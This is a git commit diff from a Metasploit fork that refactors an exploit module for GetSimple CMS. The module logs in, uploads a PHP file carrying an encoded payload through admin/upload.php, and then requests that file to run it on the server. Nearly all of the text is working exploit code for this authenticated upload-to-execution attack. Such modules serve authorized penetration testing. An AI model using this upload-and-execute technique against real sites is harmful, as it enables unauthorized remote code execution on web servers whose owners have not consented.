adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Use Rex::MIME::Message

Browse Source
This commit is contained in:
jvazquez-r7
2014-09-19 16:29:09 -05:00
parent cffb28b5d3
commit cbfb7e600d
1 changed files with 12 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/getsimplecms_upload_exec.rb
+12 -17
View File
@@ -67,31 +67,25 @@ class Metasploit3 < Msf::Exploit::Remote
})
fail_with(Failure::Unknown, "#{peer} - Unknown error while authenticating") unless res.code == 302
return res
end
def upload_file(payload_name, uri, cookie_http_header)
boundary = Rex::Text.rand_text_hex(7)
post_data = "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"file[]\"; filename=\"#{payload_name}\"\r\n"
post_data << "Content-Type: application/x-httpd-php\r\n\r\n"
post_data << "<?php "
post_data << payload.encoded
post_data << " ?>\r\n\r\n"
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
post_data << "Upload\r\n"
post_data << "--#{boundary}--\r\n"
data = Rex::MIME::Message.new
data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")
data_post = data.to_s
uri = normalize_uri(uri, "admin", "upload.php")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}",
'uri' => normalize_uri(uri, "admin", "upload.php"),
'vars_get' => { 'path' =>'' },
'cookie' => cookie_http_header,
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data_post
})
return res
end
@@ -112,11 +106,12 @@ class Metasploit3 < Msf::Exploit::Remote
upload_dir = datastore['Upload_dir']
upload_uri = normalize_uri(uri, upload_dir, payload_name.downcase)
print_status("#{peer} - Executing payload #{payload_name.downcase}")
res = send_request_raw({
send_request_raw({
'uri' => upload_uri,
'method' => 'GET'
})
}, 5)
end
end